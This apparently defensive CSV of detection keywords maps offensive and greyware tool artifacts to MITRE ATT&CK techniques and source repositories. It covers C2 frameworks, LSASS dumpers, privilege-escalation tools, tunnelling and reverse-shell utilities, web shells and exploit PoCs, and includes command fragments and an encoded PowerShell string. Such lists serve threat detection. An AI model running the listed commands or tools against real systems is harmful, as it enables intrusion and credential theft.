Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*iolonopooapdagdemdoaihahlfkncfgg*","greyware_tool_keyword","Azino VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*iomoath/PowerShx*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*ionide *","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ionided *","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ios7tojohn.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ip l set dev * address *:*:*","greyware_tool_keyword","ip","changing mac address with ip","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A" +"*ip link set ligolo up*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ip link set ligolo up*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ip route add * dev ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ip tuntap add user root mode tun ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*IPeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*IPfuscation.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*IPfuscation.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*ipscan 1*.255*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 10.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 172.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 192.168.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan.exe -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan-win64-*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*iptables -t nat -A REDSOCKS*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*IReversePortForwardService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*irkjanm/krbrelayx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*irs.exe -*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe exec*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irsl/curlshell*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*is_kirbi_file*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*is_proxy_stub_dll_loaded*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*isShellcodeThread*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*issue_shell_whoami*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*Itay Migdal*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*itm4nprivesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*its-a-feature/Apfell*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*itsKindred*","offensive_tool_keyword","Github Username","gthub username hosting malware samples and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/itsKindred","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ItsNee/Follina-CVE-2022-30190-POC*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"*itunes_backup2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*itwasalladream -u * -p * -d *","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*itwasalladream*bogus.dll*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*ItWasAllADream-master*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*IUnknownObj.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*Ivy_1*_darwin_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*Ivy_1*_linux_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*Ivy_1*_windows_amd64.exe*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*Ivy-main.zip*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*iwork2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*jackdaw --*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" +"*jackdaw.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" +"*jackit --reset --debug*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*jajilbjjinjmgcibalaakngmkilboobh*","greyware_tool_keyword","Astar VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jas502n/bypassAV*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*jatayu.php*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*jatayu-image.png*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*java -jar BeaconTool.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*java/jndi/LDAPRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*java-deserialization-exploits*","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","583","262","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z" +"*javascript-obfuscator*","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","11763","1384","2023-09-05T17:32:26Z","2016-05-09T08:16:53Z" +"*jbnmpdkcfkochpanomnkhnafobppmccn*","greyware_tool_keyword","apkfold free vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jboss_jmx_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" 